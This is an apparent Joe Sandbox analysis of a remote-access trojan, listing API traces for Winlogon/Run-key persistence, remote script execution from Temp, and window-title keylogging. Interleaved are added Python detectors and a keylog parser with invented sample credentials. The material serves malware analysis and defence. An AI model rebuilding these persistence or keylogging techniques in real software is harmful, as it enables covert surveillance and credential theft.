                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,0041580C), ref: 0040638A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C), ref: 004064D8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,0041580C,004157D0,0041580C), ref: 004064E2
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040903C
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,0041580C,004157D0,0041580C), ref: 0040636A
                                • Part of subcall function 00408FDA: RegCreateKeyA.ADVAPI32(?,?,?), ref: 00408FE7
                                • Part of subcall function 00408FDA: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,004157F8,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00408FF6
                                • Part of subcall function 00408FDA: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409000
                                • Part of subcall function 00408FDA: RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 00409013
                                • Part of subcall function 00408FDA: RegCloseKey.ADVAPI32(?,?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040901E
                                • Part of subcall function 00408FDA: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00406DFF,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040902D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00406712,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C,?,?,?,?,?,?,?,Ox@), ref: 004063A4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00410860,00000001,0041580C,004157D0,0041580C), ref: 004063AE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,0041580C), ref: 004063CE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe, ,?,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C), ref: 004063F0
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Ox@), ref: 004063FB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(00000001,00000000), ref: 00406408
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406412
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406434
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040643D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00406446
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe, ,?,00410860,004157D0,00410860,00000001,0041580C,004157D0,0041580C), ref: 00406468
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00406473
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00406480
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040648A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064AC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064B5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004064BE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00410860,00000001,0041580C), ref: 00406502
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$D@2@@0@Hstd@@V?$basic_string@$??1?$basic_string@$V10@$V10@@$??0?$basic_string@D@1@@V10@0@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                              • String ID: C:\WINDOWS\system32\userinit.exe, $Ox@$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Userinit$explorer.exe,
                              • API String ID: 3158786748-783391735
                              • Opcode ID: d483bb8dc5fae5a396b8efee62bfc1d20678eaede9f9809127a418cf3ad4d1dd
                              • Instruction ID: 3f221fffa98c3c74c31811f4ef3579c22c6f931b89917dd235009d3eae723281
                              • Opcode Fuzzy Hash: d483bb8dc5fae5a396b8efee62bfc1d20678eaede9f9809127a418cf3ad4d1dd
                              • Instruction Fuzzy Hash: A0417871D00219BBEB10BBA1DD4FEEF7F2DEB51314F00043AF90571182EAB95998C6A9
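The function above concatenates "explorer.exe," and "C:\WINDOWS\system32\userinit.exe," with a further program path and references the Winlogon, Run and Policies\Explorer\Run keys, i.e. it appends a program to the comma-separated Winlogon Shell / Userinit lists and adds Run values. The following audit is an added example, not code from the Joe Sandbox report or from the sample: it checks a registry snapshot for entries beyond the clean-install defaults. The snapshot, the user name and the file name "updater.exe" are constructed, and the "user-writable path" rule is a heuristic assumed here, not something the report states.

```python
"""Audit Winlogon Shell/Userinit and the Run keys for appended autostart entries.

Added example, not part of the Joe Sandbox report or of the analysed sample.
SAMPLE_SNAPSHOT is constructed; on a live host fill the same structure from
winreg or from `reg query` output instead.
"""
from __future__ import annotations

WINLOGON = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
RUN = r"Software\Microsoft\Windows\CurrentVersion\Run"
POLICY_RUN = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"

# Clean-install contents of the two Winlogon values, compared case-insensitively
# (the sample writes WINDOWS in upper case; the OS default is lower case).
DEFAULTS = {
    "Shell": {"explorer.exe"},
    "Userinit": {r"c:\windows\system32\userinit.exe"},
}

# Heuristic (assumption): a Run entry pointing into a user profile or a Temp
# directory deserves review; installed software normally lives under Program Files.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

SAMPLE_SNAPSHOT = {  # constructed data; "updater.exe" is a placeholder name
    WINLOGON: {
        "Shell": r"explorer.exe,C:\Users\bob\AppData\Roaming\updater.exe",
        "Userinit": r"C:\WINDOWS\system32\userinit.exe,C:\Users\bob\AppData\Roaming\updater.exe,",
    },
    RUN: {
        "OneDrive": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background",
        "updater": r"C:\Users\bob\AppData\Roaming\updater.exe",
    },
    POLICY_RUN: {},
}


def split_winlogon_list(data: str) -> list[str]:
    """Shell and Userinit hold comma-separated program lists; drop empty items."""
    return [item.strip() for item in data.split(",") if item.strip()]


def audit(snapshot: dict[str, dict[str, str]]) -> list[tuple[str, str, str]]:
    """Return (key, value_name, program) for every entry that needs review."""
    findings = []
    winlogon = snapshot.get(WINLOGON, {})
    for name, default in DEFAULTS.items():
        data = winlogon.get(name)
        if data is None:
            continue
        for program in split_winlogon_list(data):
            if program.lower() not in default:   # anything appended to the default list
                findings.append((WINLOGON, name, program))
    for key in (RUN, POLICY_RUN):
        for name, data in snapshot.get(key, {}).items():
            if any(marker in data.lower() for marker in USER_WRITABLE_MARKERS):
                findings.append((key, name, data))
    return findings


if __name__ == "__main__":
    for key, name, program in audit(SAMPLE_SNAPSHOT):
        print(f"{key}\\{name}: {program}")
```

The Winlogon comparison is a whitelist (anything not in DEFAULTS is reported), because a hijacked Shell or Userinit value still starts with the legitimate program and only differs in what follows the comma; the Run-key comparison is a heuristic and will miss an autostart entry that points into a vendor directory.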
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,?,?,?), ref: 0040D228
                              • getenv.MSVCRT ref: 0040D234
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?), ref: 0040D240
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040D24D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D258
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D261
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000001), ref: 0040D26E
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 0040D27B
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 0040D287
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 0040D2A0
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040D2AD
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CC
                              • ShellExecuteExA.SHELL32(0000003C), ref: 0040D2E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040D31F
                              • CloseHandle.KERNEL32(?), ref: 0040D328
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D331
                              • DeleteFileA.KERNEL32(00000000), ref: 0040D338
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptexecd,?), ref: 0040D30D
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscriptsuccess,?,?,?,?,?), ref: 0040D352
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(remscripterr,?), ref: 0040D36A
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?), ref: 0040D380
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D389
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D392
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?), ref: 0040D39B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@std@@@std@@$?c_str@?$basic_string@V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_ofstream@??6std@@?close@?$basic_ofstream@?is_open@?$basic_ofstream@CloseD?$basic_ofstream@D@2@@0@@D@std@@@0@DeleteExecuteFileHandleObjectShellSingleV01@@V10@V10@0@V10@@V?$basic_ostream@Waitgetenv
                              • String ID: <$@$Temp$remscripterr$remscriptexecd$remscriptsuccess
                              • API String ID: 2271834883-3956447440
                              • Opcode ID: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                              • Instruction ID: 40b226df9838ff9ebd93e372db10a445ae0d15efabd19c6d5a2c8874623cc937
                              • Opcode Fuzzy Hash: ad663a8d2a633417fe1706364678858063ddc7b1f600590b5d4ecc61305022c1
                              • Instruction Fuzzy Hash: 1F41307190011EEBDB14EFA0DD4DAEE7B78FF44305F10417AF502A21A0DBB85A89CB59
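The handler above resolves getenv("Temp"), writes the received script there with an ofstream, launches it with ShellExecuteExA, waits on the process handle and then calls DeleteFileA, so the file exists only for the duration of the run (the remscriptexecd / remscriptsuccess / remscripterr strings are the status replies). The correlation below is an added example, not from the report or from the sample: it links FileCreate, ProcessCreate and FileDelete records for the same Temp path. The records are constructed Sysmon-style events (IDs 11, 1, 23) with Sysmon's field names; the process names, paths and times are invented.

```python
"""Correlate create -> execute -> delete of a file under %TEMP%.

Added example, not from the Joe Sandbox report or the sample. SAMPLE_EVENTS
are constructed Sysmon-style records: 11 = FileCreate, 1 = ProcessCreate,
23 = FileDelete. Nothing here was taken from a real log.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

# Per-user Temp (what getenv("Temp") returns) and the system Temp directory.
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def is_temp_path(path: str) -> bool:
    return any(marker in path.lower() for marker in TEMP_MARKERS)


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


SAMPLE_EVENTS = [  # constructed; host.exe stands for the process hosting the RAT
    {"ts": _t("2024-06-28T10:00:00"), "id": 11,
     "Image": r"C:\Users\bob\AppData\Roaming\host.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\rs_4421.bat"},
    {"ts": _t("2024-06-28T10:00:01"), "id": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "C:\Users\bob\AppData\Local\Temp\rs_4421.bat"',
     "ParentImage": r"C:\Users\bob\AppData\Roaming\host.exe"},
    {"ts": _t("2024-06-28T10:00:03"), "id": 23,
     "Image": r"C:\Users\bob\AppData\Roaming\host.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\rs_4421.bat"},
    # benign: an installer leaves a log file in Temp and never executes it
    {"ts": _t("2024-06-28T10:05:00"), "id": 11,
     "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\setup.log"},
    {"ts": _t("2024-06-28T10:06:00"), "id": 23,
     "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Temp\setup.log"},
]


def temp_write_exec_delete(events, window=timedelta(minutes=5)):
    """Return (path, writer_image, executor_image, lifetime_seconds) for every
    Temp file that was created, executed and deleted within `window`."""
    tracked = defaultdict(lambda: {"create": None, "exec": None, "delete": None})
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 11 and is_temp_path(ev["TargetFilename"]):
            tracked[ev["TargetFilename"].lower()]["create"] = ev
        elif ev["id"] == 1:
            # ShellExecuteEx may run the file directly or hand it to the
            # registered handler, so match on both Image and CommandLine.
            ref = (ev.get("Image", "") + " " + ev.get("CommandLine", "")).lower()
            for path, rec in tracked.items():
                if path in ref and rec["exec"] is None:
                    rec["exec"] = ev
        elif ev["id"] == 23 and is_temp_path(ev["TargetFilename"]):
            tracked[ev["TargetFilename"].lower()]["delete"] = ev
    hits = []
    for path, rec in tracked.items():
        c, x, d = rec["create"], rec["exec"], rec["delete"]
        if c and x and d and c["ts"] <= x["ts"] <= d["ts"] <= c["ts"] + window:
            lifetime = (d["ts"] - c["ts"]).total_seconds()
            hits.append((path, c["Image"], x["Image"], lifetime))
    return hits


if __name__ == "__main__":
    for hit in temp_write_exec_delete(SAMPLE_EVENTS):
        print(hit)
```

The three-event chain is what separates this pattern from ordinary Temp churn: installers create and delete files there all the time, but rarely execute them, and a script run via ShellExecuteEx appears as the handler (cmd.exe, wscript.exe, powershell.exe) with the Temp path on its command line rather than as the Image itself.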
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004040B5
                              • Sleep.KERNEL32(000001F4), ref: 004040CB
                              • GetForegroundWindow.USER32 ref: 004040CD
                              • GetWindowTextLengthA.USER32(00000000), ref: 004040D6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 004040EB
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004040FC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404106
                              • GetWindowTextA.USER32(00000000,00000000), ref: 0040410E
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,00415748), ref: 0040411D
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00404132
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040413B
                              • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00404146
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(00000000,[ ,?, ]), ref: 00404165
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ]), ref: 0040416F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404184
                              • Sleep.KERNEL32(000003E8,?,?,?,?,?, ]), ref: 004041C9
                              • _itoa.MSVCRT ref: 004041DB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 004041FB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 0040420B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00404215
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AAD
                                • Part of subcall function 00403A9A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,76F90F00,?,00405E64), ref: 00403AC0
                                • Part of subcall function 00403A9A: SetEvent.KERNEL32(00000000,?,00405E64), ref: 00403AC9
                                • Part of subcall function 00403A9A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(76F90F00,?,00405E64), ref: 00403AD8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404227
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404230
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404239
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ]), ref: 00404247
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$??0?$basic_string@D@1@@V01@V01@@Window$?length@?$basic_string@SleepTextV10@V10@@Y?$basic_string@$??4?$basic_string@??8std@@?c_str@?$basic_string@?resize@?$basic_string@D@2@@0@0@EventForegroundLength_itoa
                              • String ID: [ ${ User has been idle for $ ]$ minutes }
                              • API String ID: 2152833798-3343415809
                              • Opcode ID: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                              • Instruction ID: 87bb5fb799bf3fa09b99bd2927ef5b1b1dfbc4c52e589369c19be6cb3ab50cf0
                              • Opcode Fuzzy Hash: 16de867c107b42ae11ad0244138e34ded14529554952528baadd8620eb8bfb8a
                              • Instruction Fuzzy Hash: 33517571900109AFDB10ABE0DC8DAEE7B78EB95314F04447AF601B31D1DB7899C5CB59
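The loop above sleeps 500 ms, reads the foreground window title with GetWindowTextA, compares it with the previously stored title and, when it changed, records it as "[ <title> ]"; after a period without input it records "{ User has been idle for N minutes }". The parser below is an added example, not code from the report or the sample: it splits a captured log on exactly those two markers and attributes the keystrokes between them to the window that had focus. Only the markers visible in this function are handled; a real capture may carry other fields that this does not model. SAMPLE_LOG is constructed.

```python
"""Split a keystroke log on the window-title and idle markers seen above.

Added example, not from the Joe Sandbox report or the sample. Only the two
markers visible in the function above are parsed; SAMPLE_LOG is constructed.
"""
from __future__ import annotations

import re

MARKER = re.compile(
    r"\[ (?P<title>.*?) \]"                                   # foreground window changed
    r"|\{ User has been idle for (?P<idle>\d+) minutes \}"    # idle notice
)

SAMPLE_LOG = (
    "[ Inbox - Outlook ]hello team, see attached"
    "{ User has been idle for 12 minutes }"
    "[ Sign in - Contoso Bank ]jdoe pa55word"
    "[ Untitled - Notepad ]"
)


def parse_keylog(text: str) -> list[tuple[str, str]]:
    """Return ("window", title), ("idle", minutes) and ("keys", text) in log order."""
    events, pos = [], 0
    for m in MARKER.finditer(text):
        keys = text[pos:m.start()]
        if keys:
            events.append(("keys", keys))
        if m.group("title") is not None:
            events.append(("window", m.group("title")))
        else:
            events.append(("idle", m.group("idle")))
        pos = m.end()
    if text[pos:]:
        events.append(("keys", text[pos:]))
    return events


def keys_by_window(text: str) -> dict[str, str]:
    """Attribute captured keystrokes to the window that had focus at the time."""
    out, current = {}, "<unknown>"
    for kind, value in parse_keylog(text):
        if kind == "window":
            current = value
            out.setdefault(current, "")
        elif kind == "keys":
            out[current] = out.get(current, "") + value
    return out


if __name__ == "__main__":
    for window, keys in keys_by_window(SAMPLE_LOG).items():
        print(f"{window!r}: {keys!r}")
```

The title match is non-greedy, so a window title that itself contains " ]" is cut short; since the log carries no escaping for that case, the parser cannot do better than report the prefix.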
                              APIs
                              • RegQueryInfoKeyA.ADVAPI32(004095BF,?,00000000,00000000,004095BF,?,?), ref: 004092D6
                              • RegEnumKeyExA.ADVAPI32(004095BF,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00409305
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?), ref: 0040931B
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000), ref: 0040932D
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,004095BF,00409BF5), ref: 0040933B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 00409344
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,004095BF,00409BF5), ref: 0040934D
                              • RegEnumValueA.ADVAPI32(004095BF,?,?,00003FFF,00000000,?,?,00002710), ref: 004093AD
                              • _itoa.MSVCRT ref: 004093C4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,004095BF,00409BF5), ref: 004093DD
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,004095BF,00409BF5), ref: 004093EF
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004095BF,00409BF5), ref: 004093FD
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409406
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004095BF,00409BF5), ref: 00409412
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410EC8,?,?,?,?,?,004095BF,00409BF5), ref: 00409423
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,00000000,?,?,?,?,004095BF,00409BF5), ref: 00409432
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409440
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409449
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409455
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([regsplt],?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 0040946A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409485
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 00409493
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094A1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,004095BF,00409BF5), ref: 004094AD
